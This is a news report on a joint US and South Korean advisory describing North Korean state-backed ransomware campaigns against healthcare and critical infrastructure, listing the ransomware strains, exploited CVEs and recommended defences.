Hacker groups working on behalf of the North Korean government target organizations in the healthcare sector and critical infrastructure entities with ransomware attacks to generate revenue to support the Kim regime, a joint advisory from the US and South Korean cybersecurity authorities warns.
As per agencies, North Korean state-backed hackers employed various ransomware tools like their own ransomware strains Maui and H0lyGh0st, but also used ransomware developed by other cybercriminal gangs such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom. In some cases North Korean threat actors posed as other ransomware groups, such as REvil.
In order to gain access and escalate privileges on target networks threat actors use various exploits of common vulnerabilities in popular software, including Apache Log4J (CVE-2021-44228), SonicWall aplliances (CVE-2021-20038), TerraMaster TOS (CVE-2022-24990). Threat actors also likely spread malicious code through trojanized files for “X-Popup,” an open source messenger commonly used by employees of small and medium hospitals in South Korea.
“DPRK actors generate domains, personas, and accounts; and identify cryptocurrency services to conduct their ransomware operations. Actors procure infrastructure, IP addresses, and domains with cryptocurrency generated through illicit cybercrime, such as ransomware and cryptocurrency theft,” the advisory said.
North Korean hackers were also observed using virtual private networks (VPNs) and virtual private servers (VPSs) or third-country IP addresses to hide their location.
“DPRK cyber actors have been observed setting ransoms in bitcoin. Actors are known to communicate with victims via Proton Mail email accounts,” the advisory said. “For private companies in the healthcare sector, actors may threaten to expose a company’s proprietary data to competitors if ransoms are not paid.”
To prevent such attacks the cybersecurity authorities recommend organizations to implement the principle of least privilege, disable unnecessary network device management interfaces, enforce multi-layer network segmentation, require phishing-resistant authentication controls, and maintain periodic data backups.
UN experts said that hackers tied to North Korea stole record-breaking virtual assets in 2022 estimated to be worth between $630 million and more than $1 billion.